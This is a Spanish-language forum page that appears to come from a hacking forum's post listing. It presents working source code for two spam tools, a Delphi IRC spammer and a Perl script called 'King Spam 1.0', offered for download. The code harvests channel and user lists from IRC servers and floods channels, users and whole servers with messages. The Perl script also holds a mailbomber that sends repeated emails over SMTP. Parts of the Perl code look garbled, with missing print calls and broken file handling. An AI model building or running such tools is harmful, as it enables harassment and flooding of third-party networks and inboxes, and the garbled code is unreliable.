TButton; StatusBar1: TStatusBar; GroupBox6: TGroupBox; canal_spam_usuarios: TEdit; TabSheet4: TTabSheet; GroupBox7: TGroupBox; Image2: TImage; Label7: TLabel; PopupMenu1: TPopupMenu; L1: TMenuItem; R1: TMenuItem; OpenDialog1: TOpenDialog; file_spam: TListBox; spam_usuarios: TTimer; Button11: TButton; Button6: TButton; otrospamfile: TListBox; Image3: TImage; procedure Button2Click(Sender: TObject); procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean; const AMessage: string); procedure Button3Click(Sender: TObject); procedure Button4Click(Sender: TObject); procedure Button5Click(Sender: TObject); procedure Button1Click(Sender: TObject); procedure L1Click(Sender: TObject); procedure R1Click(Sender: TObject); procedure spam_usuariosTimer(Sender: TObject); procedure 
Button11Click(Sender: TObject); procedure Button6Click(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; buscando_usuarios: string; buscando_canales: string; control_guardar_canales: string; control_guardar_users: string; implementation {$R *.dfm} // Functions procedure savefile(filename, texto: string); var ar: TextFile; begin AssignFile(ar, filename); FileMode := fmOpenWrite; if FileExists(filename) then Append(ar) else Rewrite(ar); Write(ar, texto + sLineBreak); CloseFile(ar); end; procedure TForm1.Button11Click(Sender: TObject); begin StatusBar1.Panels[0].Text := '[+] Finished'; StatusBar1.Update; IdIRC1.Disconnect; spam_usuarios.Enabled := false; end; procedure TForm1.Button1Click(Sender: TObject); var i: integer; contenido: TStringList; stream: TFileStream; begin file_spam.Clear; if OpenDialog1.Execute then begin spam.Text := OpenDialog1.filename; contenido := TStringList.Create; stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone); contenido.LoadFromStream(stream); for i := 0 to contenido.Count - 1 do begin file_spam.Items.Add(contenido[i]); end; end; end; procedure TForm1.Button2Click(Sender: TObject); var seleccion: integer; begin canales.Items.Clear; buscando_canales := 'yes'; seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0); if seleccion = mrYes then begin control_guardar_canales := 'yes'; end; StatusBar1.Panels[0].Text := '[+] Searching channels ...'; StatusBar1.Update; // IdIRC1.Disconnect; IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; try begin IdIRC1.Connect; IdIRC1.Raw('LIST'); end; except begin ShowMessage('Error connecting'); end; end; if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then begin ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + 
host.Text + '_canales.txt'), nil, nil, SW_SHOWNORMAL); end; end; procedure TForm1.Button3Click(Sender: TObject); var seleccion: integer; begin users.Items.Clear; buscando_usuarios := 'yes'; seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0); if seleccion = mrYes then begin control_guardar_users := 'yes'; end; StatusBar1.Panels[0].Text := '[+] Searching users ...'; StatusBar1.Update; // IdIRC1.Disconnect; IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; try begin IdIRC1.Connect; IdIRC1.Join(canal.Text); end; except begin ShowMessage('Error connecting'); end; end; if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then begin ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt'), nil, nil, SW_SHOWNORMAL); end; end; procedure TForm1.Button4Click(Sender: TObject); begin lista_canales.Items.Add(canal_agregar.Text); end; procedure TForm1.Button5Click(Sender: TObject); var i: integer; canal_z: string; begin StatusBar1.Panels[0].Text := '[+] Spamming channel ...'; StatusBar1.Update; console1.Clear; try begin IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; IdIRC1.Connect; for i := 0 to lista_canales.Count - 1 do begin canal_z := lista_canales.Items[i]; IdIRC1.Join(canal_z); console1.Lines.Add('[+] Spam in channel : ' + canal_z); IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]); Sleep(2000); IdIRC1.Part(canal_z); Sleep(2000); end; end; except ShowMessage('Error connecting'); end; IdIRC1.Disconnect; StatusBar1.Panels[0].Text := '[+] Finished'; StatusBar1.Update; end; procedure TForm1.Button6Click(Sender: TObject); begin StatusBar1.Panels[0].Text := '[+] Spamming users ...'; StatusBar1.Update; IdIRC1.Nickname 
:= nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; try begin IdIRC1.Connect; IdIRC1.Join(canal_spam_usuarios.Text); spam_usuarios.Interval := 10000; spam_usuarios.Enabled := true; end; except begin ShowMessage('Error connecting'); end; end; end; procedure TForm1.FormCreate(Sender: TObject); begin if not DirectoryExists('logs') then begin CreateDir('logs'); end; OpenDialog1.InitialDir := GetCurrentDir; end; procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean; const AMessage: string); var code: string; regex: TPerlRegEx; otroregex: TPerlRegEx; canales_encontrados: string; control: TPerlRegEx; otrocontrol: TPerlRegEx; i: integer; i2: integer; renicks: string; listanow: TStringList; arraynow: array of String; begin code := AMessage; regex := TPerlRegEx.Create(); otroregex := TPerlRegEx.Create(); // console1.Lines.Add(code); regex.regex := '322 (.*?) (.*?) (.*?) :'; regex.Subject := code; if regex.Match then begin canales_encontrados := regex.Groups[2]; canales.Items.Add(canales_encontrados); if (control_guardar_canales = 'yes') then begin savefile('logs/' + host.Text + '_canales.txt', canales_encontrados); end; end; otroregex.regex := '353 (.*) = #(.*) :(.*)'; otroregex.Subject := code; if otroregex.Match then begin renicks := otroregex.Groups[3]; renicks := StringReplace(renicks, nombre.Text, '', []); listanow := TStringList.Create; listanow.Delimiter := ' '; listanow.DelimitedText := renicks; for i2 := 0 to listanow.Count - 1 do begin users.Items.Add(listanow[i2]); if (control_guardar_users = 'yes') then begin savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]); end; end; end; control := TPerlRegEx.Create(); control.regex := 'End of /LIST'; control.Subject := code; if control.Match then begin if (buscando_canales = 'yes') then begin ShowMessage('Channels Loaded'); StatusBar1.Panels[0].Text := '[+] Channels Found'; 
StatusBar1.Update; regex.Free; IdIRC1.Disconnect; IdIRC1.Destroy; buscando_canales := 'no'; end; end; otrocontrol := TPerlRegEx.Create(); otrocontrol.regex := 'End of /NAMES'; otrocontrol.Subject := code; if otrocontrol.Match then begin if (buscando_usuarios = 'yes') then begin ShowMessage('Users Loaded'); StatusBar1.Panels[0].Text := '[+] Users Found'; StatusBar1.Update; otrocontrol.Free; IdIRC1.Part(canal.Text); IdIRC1.Disconnect; IdIRC1.Destroy(); buscando_usuarios := 'no'; end; end; end; procedure TForm1.L1Click(Sender: TObject); var i: integer; contenido: TStringList; stream: TFileStream; begin if OpenDialog1.Execute then begin contenido := TStringList.Create; stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone); contenido.LoadFromStream(stream); for i := 0 to contenido.Count - 1 do begin lista_canales.Items.Add(contenido[i]); end; end; end; procedure TForm1.R1Click(Sender: TObject); begin lista_canales.Clear; end; procedure TForm1.spam_usuariosTimer(Sender: TObject); var i: integer; begin for i := 0 to users.Count - 1 do begin StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i]; StatusBar1.Update; console2.Lines.Add('[+] Spamming to ' + users.Items[i]); IdIRC1.Say(users.Items[i], file_spam.Items[Random(file_spam.Count - 1) + 0]); end; end; end. // The End ?
Si lo quieren bajar lo pueden hacer de aca
|
|
|
60
|
Programación / Scripting / [Perl] King Spam 1.0
|
en: 15 Mayo 2015, 18:25 pm
|
Un simple script en Perl para hacer spam en canales IRC y correos. Tiene las siguientes opciones : - Spammear un canal normalmente o por siempre
- Spammear un servidor entero
- Spammear una lista de servidores y todos sus canales
- Poder elegir un nick para el bot y un timeout
- Permite spammear cuentas de correo
El codigo : #!usr/bin/perl #King Spam 1.0 #(C) Doddy Hackman 2015 # SMTP Servers #smtp.gmail.com - 465 #smtp.mail.yahoo.com -587 use IO::Socket; use Color::Output; Color::Output::Init; use Getopt::Long; #use Win32::OLE; my $nick_secundario = "Cl4ptr4p"; my $timeout_secundario = "5"; GetOptions( "get_channels=s" => \$get_channels, "get_users=s" => \$get_users, "spam_channel=s" => \$spam_channel, "spam_channel_forever=s" => \$spam_channel_forever, "spam_server=s" => \$spam_server, "spam_servers_file=s" => \$spam_servers_file, "spam_targets=s" => \$spam_targets, "spam_file=s" => \$spam_file, "channel=s" => \$channel, "port=s" => \$port, "nick=s" => \$nick, "savefile=s" => \$file, "timeout=s" => \$timeout, "mailbomber" => \$mailbomber ); head(); if ($get_channels) { my $port_now = ""; my $nick_now = ""; my $file_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$file ) { $file_now = ""; } else { $file_now = $file; } listar_canales( $get_channels, $port_now, $nick_now, $file_now ); } elsif ($get_users) { my $port_now = ""; my $nick_now = ""; my $file_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } printear_titulo("[+] Serching users ...\n\n"); my @usuarios = buscar_usuarios( $get_users, $port_now, $nick_now, $channel ); if ( int(@usuarios) eq "0" ) { printear("[-] Users not found\n"); } else { printear("[+] Users Found : "); for my $usuario (@usuarios) { printear("[+] User : "); savefile( $file, $usuario ); } } } elsif ($spam_channel) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } spam_canal( $spam_channel, $port_now, 
$nick_now, $channel, $spam_file, $timeout_now ); } elsif ($spam_channel_forever) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } spam_canal_forever( $spam_channel_forever, $port_now, $nick_now, $channel, $spam_file, $timeout_now ); } elsif ($spam_server) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now ); for my $encontrado (@encontrados) { if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) { my $canal = $1; my $cantidad = $2; spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file, $timeout_now ); } } } elsif ($spam_servers_file) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } unless ( -f $spam_servers_file ) { printear("[-] File not found\n\n"); copyright(); } else { my @lista = loadfile($spam_servers_file); printear("[+] Servers Found : "); printear_titulo( "\n-------------------------------------------------------------\n" ); for my $spam_server (@lista) { my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now ); for my $encontrado (@encontrados) { if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) { my $canal = $1; my $cantidad = $2; spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file, $timeout_now ); printear_titulo( 
"\n-------------------------------------------------------------\n" ); } } } } } elsif ($spam_targets) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } if ( -f $spam_targets ) { my @datos = loadfile($spam_targets); printear("[+] Servers Found : "); printear_titulo( "\n-------------------------------------------------------------\n" ); for my $dato (@datos) { if ( $dato =~ /(.*) --- (.*)/ ) { my $server = $1; my $canal = $2; spam_canal( $server, $port_now, $nick_now, $canal, $spam_file, $timeout_now ); printear_titulo( "\n-------------------------------------------------------------\n" ); } } } else { printear("\n[-] File not Found\n\n"); copyright(); } } elsif ($mailbomber) { printear_titulo("[+] Spam Mails : OK\n\n\n"); printear("[+] Host : "); chomp( my $host = <stdin> ); printear("\n[+] Port : "); chomp( my $puerto = <stdin> ); printear("\n[+] Username : "); chomp( my $username = <stdin> ); printear("\n[+] Password : "); chomp( my $password = <stdin> ); printear("\n[+] Count Message : "); chomp( my $count = <stdin> ); printear("\n[+] To : "); chomp( my $to = <stdin> ); printear("\n[+] Subject : "); chomp( my $asunto = <stdin> ); printear("\n[+] Body : "); chomp( my $body = <stdin> ); printear("\n[+] File to Send : "); chomp( my $file = <stdin> ); printear_titulo("\n[+] Starting ...\n\n"); for my $num ( 1 .. 
$count ) { printear("[+] Sending Message : "); sendmail( $host, $puerto, $username, $password, $username, $username, $username, $to, $asunto, $body, $file ); } printear_titulo("\n[+] Finished\n"); } else { sintax(); } copyright(); # Functions sub spam_canal { my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; my $canal = $_[3]; my $archivo = $_[4]; printear("[+] Connecting to "); my @nicks = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] ); my $contador = 0; my $termine = 0; my $timeout = $_[5]; my @spamnow = loadfile($archivo); if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $canal\r\n"; printear_titulo("[+] Users Found : "); while ( my $log = <$socket> ) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $contador eq "0" ) { printear("[+] Spam in channel : "); print $socket "PRIVMSG $canal " . $spamnow[ rand(@spamnow) ] . 
"\r\n"; $contador++; } foreach $names (@nicks) { unless ( $nombre eq $names ) { $names =~ s/\@//; $names =~ s/\+//; print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n"; printear("[+] Spam to user $names : "); } $termine++; } if ( $termine eq int(@nicks) ) { $socket->close(); last; } } } else { printear("[-] Error\n"); $socket->close(); } } sub spam_canal_forever { my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; my $canal = $_[3]; my $archivo = $_[4]; printear("[+] Connecting to "); my @nicks = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] ); my $contador = 0; my $termine = 0; my $timeout = $_[5]; my @spamnow = loadfile($archivo); if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $canal\r\n"; printear_titulo("[+] Users Found : "); while ( my $log = <$socket> ) { while (1) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $contador eq "0" ) { printear("[+] Spam in channel : "); print $socket "PRIVMSG $canal " . $spamnow[ rand(@spamnow) ] . 
"\r\n"; $contador++; } foreach $names (@nicks) { unless ( $nombre eq $names ) { $names =~ s/\@//; $names =~ s/\+//; "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n"; printear("[+] Spam to user $names : "); } $termine++; } $contador = 0; } if ( $termine eq int(@nicks) ) { $socket->close(); last; } } } else { printear("[-] Error\n"); $socket->close(); } } sub buscar_usuarios { my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; my $canal = $_[3]; if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $canal\r\n"; while ( my $log = <$socket> ) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) { my $pro = $4; $pro =~ s/$nombre//; my @nicks = split " ", $pro; $socket->close(); } } } } sub buscar_canales { my @resultado; my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "LIST\r\n"; while ( my $log = <$socket> ) { if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) { my $canal = $2; my $cantidad = $3; push( @resultado, $canal . "-soy_un_limite-" . 
$cantidad ); } if ( $log =~ /:End of \/LIST/ ) { last; } } $socket->close; } } sub listar_canales { my $host = $_[0]; my $port = $_[1]; my $nick = $_[2]; my $file = $_[3]; printear_titulo("[+] Serching channels ...\n\n"); my @encontrados = buscar_canales( $host, $port, $nick ); if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) { printear_titulo("[-] Channels not found\n"); } else { printearf_titulo( "Channels", "Users" ); for my $encontrado (@encontrados) { if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) { my $canal = $1; my $cantidad = $2; printearf( $canal, $cantidad ); if ( $file ne "" ) { savefile( $file, $canal ); } } } } } sub sendmail { ## Function Based on : http://code.activestate.com/lists/pdk/5351/ ## Credits : Thanks to Phillip Richcreek and Eric Promislow my ( $host, $port, $username, $password, $from, $cc, $bcc, $to, $asunto, $mensaje, $file ) = @_; $correo = Win32::OLE->new('CDO.Message'); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/sendusername', $username ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/sendpassword', $password ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpserverport', $port ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 ); $correo->Configuration->Fields->Update(); if ( -f $file ) { $correo->AddAttachment($file); } $correo->{From} = $from; $correo->{CC} = $cc; $correo->{BCC} = $bcc; $correo->{To} = $to; $correo->{Subject} 
= $asunto; $correo->{TextBody} = $mensaje; $correo->Send(); } # More Functions sub printearf_titulo { cprintf( "\x0310" . "%-32s %s" . "\x030\n", $_[0], $_[1] ); } sub printearf { cprintf( "\x036" . "%-32s %s" . "\x030\n", $_[0], $_[1] ); } sub printear { cprint( "\x036" . $_[0] . "\x030" ); } sub printear_logo { cprint( "\x037" . $_[0] . "\x030" ); } sub printear_titulo { cprint( "\x0310" . $_[0] . "\x030" ); } sub savefile { open( SAVE , ">>" . $_[0] ); } sub loadfile { if ( -f $_[0] ) { my @words; my @r; @words = <FILE>; for (@words) { } } else { printear("\n[-] File not found\n\n"); copyright(); } } sub sintax { printear("[+] Sintax : "); print "perl $0 <option> <value>\n"; printear("\n[+] Options : \n\n"); "-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n"; "-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Channels of a server\n"; "-spam_channel <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel\n"; "-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n"; "-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n"; "-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n"; "-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n"; print "-mailbomber : Open MailBomber\n"; printear("\n[+] Example : \n\n"); print "perl kingspam.pl -get_channels localhost\n"; print "perl kingspam.pl -get_users localhost -channel #locos\n"; "perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n"; "perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n"; print "perl kingspam.pl -spam_server localhost -spam_file 
c:/spam.txt\n"; "perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n"; "perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n"; print "perl kingspam.pl -mailbomber\n"; } sub head { printear_logo("\n-- == KingSpam 1.0 == --\n\n\n"); } sub copyright { printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n"); } # The End ?
Un video con ejemplos de uso : Si quieren bajar el programa lo pueden hacer de aca : SourceForge.
|
|
|
|
|
|
|